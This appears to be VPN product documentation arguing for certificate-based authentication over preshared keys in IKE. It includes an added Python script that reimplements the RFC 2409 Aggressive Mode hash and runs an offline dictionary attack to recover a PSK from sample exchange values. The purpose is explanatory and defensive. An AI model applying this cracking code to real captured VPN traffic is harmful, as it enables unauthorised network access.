In some cases, certificates can be used in place of the otherwise widespread preshared key (PSK) method for securing VPN connections:
- Higher security for VPN client connections (with IKE Main Mode): With PSK authentication, Main Mode cannot be used between peers that have dynamic IP addresses, because the responder has to select the preshared key by the peer's IP address before the (encrypted) identities are exchanged. In these cases Aggressive Mode must be used, with its lower degree of security: the identities and the authentication hashes are transmitted in the clear, which exposes the PSK to offline dictionary attacks. Using certificates allows peers with dynamic IP addresses, such as dial-in computers with the LANCOM Advanced VPN Client, to use Main Mode and thus to increase the level of security.
- Higher security for keys and passwords: Preshared keys are just as susceptible as any other password, and the way users handle them (the "human factor") largely determines how well a connection is secured. With certificate-based VPN establishment, the keys in the certificates are generated automatically with the desired key length. Furthermore, randomly generated keys offer more protection against attack (e.g. dictionary attacks) than preshared keys of the same length that are thought up by people.
- Peer authenticity can be checked: Certificates allow both ends of the connection to be authenticated during VPN connection establishment. Certificates can contain additional information that is useful for checking the peer. The limited validity period of a certificate provides additional protection, e.g. for users who receive only temporary access to a network.
- Support for tokens and smartcards: Certificates stored on external media can be integrated into "strong security" environments that prevent the private key from being read from the computer.
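The weakness behind the first two points is worth seeing concretely. The script below is an added example, not LANCOM documentation or code: it recomputes the IKEv1 authentication hash exactly as RFC 2409 defines it for preshared keys and runs an offline dictionary attack against a hash as captured from an Aggressive Mode exchange. All exchange values, the wordlist and the hostname are constructed for the example, and HMAC-SHA1 is assumed as the negotiated PRF.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed values, not from a real capture. They stand for what an
# eavesdropper sees in an IKEv1 Aggressive Mode exchange (RFC 2409 section 5.5):
# every field travels unencrypted, including HASH_R in the responder's message.
# In Main Mode, HASH_I and HASH_R are sent in messages 5 and 6 under encryption,
# so this offline check is not available to an eavesdropper; but the responder
# must already have picked the PSK by source IP address to decrypt them, which is
# why Main Mode with PSK does not work for peers with dynamic addresses.
CAPTURE = {
    "ni_b":   bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0"),  # initiator nonce
    "nr_b":   bytes.fromhex("f0e1d2c3b4a5968778695a4b3c2d1e0f"),  # responder nonce
    "gxi":    bytes.fromhex("aa" * 128),  # initiator DH public value (1024-bit stand-in)
    "gxr":    bytes.fromhex("bb" * 128),  # responder DH public value
    "cky_i":  bytes.fromhex("0011223344556677"),  # initiator cookie
    "cky_r":  bytes.fromhex("8899aabbccddeeff"),  # responder cookie
    "sai_b":  bytes.fromhex("0000000100000001000000240101000000000001800b0001800c0e10"),  # SA body
    "idir_b": bytes([0x02, 0x00, 0x00, 0x00]) + b"vpn.example.com",  # ID_FQDN, proto/port 0
}

# Constructed wordlist; a real attacker would use millions of entries.
WORDLIST = [b"password", b"vpn", b"lancom", b"Summer2019", b"lancom2024", b"letmein"]


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes, prf=hashlib.sha1) -> bytes:
    """SKEYID for preshared-key authentication: prf(PSK, Ni_b | Nr_b) (RFC 2409 5.4).
    With signature (certificate) authentication SKEYID = prf(Ni_b | Nr_b, g^xy)
    instead, so there is no guessable secret in the derivation at all."""
    return hmac.new(psk, ni_b + nr_b, prf).digest()


def hash_r(skeyid: bytes, cap: dict, prf=hashlib.sha1) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b) (RFC 2409 5)."""
    msg = cap["gxr"] + cap["gxi"] + cap["cky_r"] + cap["cky_i"] + cap["sai_b"] + cap["idir_b"]
    return hmac.new(skeyid, msg, prf).digest()


def responder_hash_r(psk: bytes, cap: dict) -> bytes:
    """What the responder puts on the wire in Aggressive Mode message 2."""
    return hash_r(skeyid_psk(psk, cap["ni_b"], cap["nr_b"]), cap)


def crack_psk(observed_hash_r: bytes, cap: dict, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each candidate PSK from the
    captured public values and compare it with the HASH_R seen on the wire.
    No further contact with either peer is needed, so lockouts and rate limits
    on the VPN gateway do not help."""
    for cand in candidates:
        if hmac.compare_digest(responder_hash_r(cand, cap), observed_hash_r):
            return cand
    return None


if __name__ == "__main__":
    # Human-chosen PSK: recovered from a single captured exchange.
    human_psk = b"lancom2024"
    print("recovered:", crack_psk(responder_hash_r(human_psk, CAPTURE), CAPTURE, WORDLIST))

    # Machine-generated 256-bit PSK: the wordlist fails, and the 2**256 keyspace
    # leaves only brute force. Certificates go one step further by removing the
    # shared secret from the key derivation entirely.
    random_psk = os.urandom(32)
    print("recovered:", crack_psk(responder_hash_r(random_psk, CAPTURE), CAPTURE, WORDLIST))
```

The same code with a real capture is what tools such as ike-scan's psk-crack do; the lesson for a deployment is that a PSK used in Aggressive Mode is only as strong as its resistance to an unlimited offline guessing attack, which is the property a human-chosen password rarely has and a generated key or a certificate-based exchange gives you by construction.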
These advantages have to be weighed against the considerable additional effort of introducing and maintaining a public key infrastructure (PKI).